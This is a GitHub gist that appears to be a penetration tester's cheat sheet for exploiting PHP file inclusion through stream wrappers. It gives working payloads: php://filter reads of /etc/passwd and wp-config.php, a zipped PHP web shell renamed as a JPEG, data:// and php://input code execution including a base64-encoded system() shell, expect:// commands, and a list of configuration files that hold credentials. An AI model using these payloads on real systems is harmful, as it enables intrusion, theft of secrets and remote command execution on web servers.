Skip to content

Instantly share code, notes, and snippets.

@tanaka-geek

tanaka-geek/php-wrapper.md

Last active June 30, 2021 22:40
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save tanaka-geek/2d457889eca484bd26773de885c185d9 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save tanaka-geek/2d457889eca484bd26773de885c185d9 to your computer and use it in GitHub Desktop.
Download ZIP
php stream wrappers that will come handy
Raw
php-wrapper.md

filter

can display php files in text otherwise that is executed.

php://filter/convert.base64-encode/resource=file:///challenge
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/wp-config.php

zip

unzip and execute it

echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php; 
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php

data

requires allow_url_include=On

it executes the php code appended by the wrapper data://content-type

http://example.com/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.com/?page=data://text/plain,<?php phpinfo(); ?>
http://example.com/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
// the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

expect

it directly executes a shell command diabled by default

http://example.com/index.php?page=expect://id

input

send data with POST and execute php code as data

curl -X POST example.com?page=php://input%00 --data "<?php phpinfo(); ?>"

Burpsuite request looks like

POST example.com?page=php://input%00 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data
Content-Length: 1337
Referer: http://example.com
Cookie: PHPSESSID=asdklahfaiohsfioaofha
Connection: keep-alive
Upgrade-Insecure-Requests: 1

<?php system('id'); ?>

These below are the files to check with wrappers otherwise not shown

/etc/phpmyadmin/config.inc.php
/etc/squirrelmail/config/config.php
/etc/squirrelmail/config_default.php
/etc/squirrelmail/config_local.php
/etc/squirrelmail/config.php
/etc/squirrelmail/filters_setup.php
/etc/squirrelmail/index.php
/etc/squirrelmail/sqspell_config.php
/Library/WebServer/Documents/default.php
/Library/WebServer/Documents/index.php
/private/etc/squirrelmail/config/config.php
/srv/www/htdos/squirrelmail/config/config.php
/usr/local/php4/apache2.conf.php
/usr/local/php4/apache.conf.php
/usr/local/php4/httpd.conf.php
/usr/local/php5/apache2.conf.php
/usr/local/php5/apache.conf.php
/usr/local/php5/httpd.conf.php
/usr/local/php/apache2.conf.php
/usr/local/php/apache.conf.php
/usr/local/php/httpd.conf.php
/usr/local/psa/admin/htdocs/domains/databases/phpMyAdmin/libraries/config.default.php
/usr/share/squirrelmail/config/config.php
/usr/share/squirrelmail/plugins/squirrel_logger/setup.php
/var/www/html/squirrelmail/config/config.php
/var/www/html/wp-config.php
/var/www/html/wordpress/wp-config.php
/var/www/html/wp/wp-config.php
/var/www/squirrelmail/config/config.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/xampp/htdocs/admin.php
/xampp/phpMyAdmin/config.inc.php
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment